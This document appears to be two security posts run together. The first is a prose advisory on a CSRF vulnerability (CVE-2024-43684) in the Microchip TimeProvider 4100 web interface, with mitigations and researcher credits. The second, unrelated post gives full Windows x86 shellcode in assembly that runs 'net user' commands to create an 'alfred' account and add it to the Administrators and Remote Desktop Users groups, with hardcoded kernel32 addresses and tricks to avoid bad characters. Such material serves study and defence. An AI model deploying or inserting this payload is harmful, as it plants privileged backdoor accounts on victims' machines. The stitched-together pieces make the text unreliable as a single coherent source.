CVE-2024-43684: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - CROSS-SITE REQUEST FORGERY (CSRF) - CWE-352

Proceeding with the analysis of the "TimeProvider 4100 grandmaster" device, it was possible to find out a Cross-Site Request Forgery (CSRF) vulnerability.

TimeProvider 4100 Grandmaster Device

The device’s web interface does not implement Anti-CSRF token, leaving it susceptible to malicious requests being submitted on behalf of an authenticated user.

CSRF attacks exploit the trust a web application places in a user’s browser. Without CSRF protections in place, an attacker can craft a malicious web page that, when visited by an authenticated user, silently sends unauthorized requests to the device—executing actions with the user’s privileges.

In this case, the vulnerability allows attackers to modify system parameters or UI elements without user consent. 

For example, the following proof-of-concept (PoC) demonstrates changing the web interface banner to display the text “CSRFATTACK”.

CSRF Attack PoC

Exploitation Steps

An attacker could exploit this vulnerability as follows:

1. The victim logs into the TimeProvider 4100 web interface and retains an active session.

2. The victim visits a malicious webpage crafted by the attacker.

3. The page contains hidden HTML or JavaScript code that issues an authenticated request to the device (e.g., modifying configuration or display elements).

4. The device processes the request, assuming it was legitimately issued by the user.

The following image shows the device's web interface banner modified as a result of the CSRF attack:

Recommended Mitigations:

• Implement anti-CSRF tokens in all state-changing HTTP requests to ensure they originate from legitimate sources.

• Use the SameSite attribute in cookies to reduce cross-origin request risks.

• Educate users to avoid visiting untrusted links while logged into administrative systems.

• Restrict access to the device’s web interface to only trusted networks and users.

Conclusion:

The lack of anti-CSRF protection in the TimeProvider 4100 introduces a significant security risk, especially in environments where the web interface is exposed to internal or external users. This vulnerability can lead to unauthorized configuration changes, potential system misuse, and undermines the integrity of user actions.

Reporting Information:

CVE Identifier: CVE-2024-43684

CVSS Score: 8.8
Affected Versions: Firmware 1.0 through 2.4.7

Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43684
Vendor Reference:https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-cross-site-request-forgery
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Shellcode: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group (240 bytes)

Today’s post demonstrates how to craft a shellcode using the JMP/CALL/POP technique and static addresses of kernel32.dll functions to bypass the small stack space limitation. 

Specifically, this Windows x86 shellcode leverages the CreateProcessA API to create a new user and add it to both the ‘Administrators’ and ‘Remote Desktop Users’ groups.

To bypass bad characters, the shellcode alternates the message db string between uppercase and lowercase letters.  

In order to bypass the previously outlined constraints, the following shellcode was written based on these design specifications:

• Function address of CreateProcessA in kernel32.dll: 0x77082082

• Function address of ExitProcess in kernel32.dll: 0x770d214f

• Administartor user credentials: alfred:test

• Size of message db parameter, 152 bytes -> 0x98 hex = 0x111111A9 - 0x11111111 (0x00 badchar avoidance)

Shellcode Assembly Code:

global _start
section .text

_start:
jmp application

firststep:
pop edi
xor eax, eax
mov esi, 0x111111A9
sub esi, 0x11111111
mov [edi+esi], al                       ; size of message db parameter

StartUpInfoANDProcessInformation:
push eax                                ; hStderror null in this case
push eax                                ; hStdOutput, null
push eax                                ; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12                            ; 18 times loop to fill both structures.

looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101            ; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44; cb=3D0x44
lea eax, [esp+0x10]                     ; eax points to StartUpInfo
        ; eax holds a pointer to StartUPinfo
        ; esp holds a pointer to Process_Info filled of null values

createprocessA:
push esp                                ; pointer to Process-Info
push eax                                ; pointer to StartUpInfo
xor ebx, ebx
push ebx                                ; null
push ebx                                ; null
push ebx                                ; null
inc ebx
push ebx                                ; bInheritHandles=3Dtrue
dec ebx
push ebx                                ; null
push ebx                                ; null
push edi                                ; pointer to message db string

push ebx                                ; null
mov edx, 0x77082082                     ; CreateProcessA addr in kernel32.dll
call edx

ExitProcess:
push eax                                ; createprocessA return in eax
mov edx, 0x770d214f                     ; ExitProcess addr in kernel32.dll
call edx

application:
call firststep
message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'

Supplementary Information: 

Shellcode Architecture: Windows x86

Shellcode Length: 240 Bytes

Tested on: 

• Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)

• Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)

• Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)

Public Database: https://www.exploit-db.com/shellcodes/49592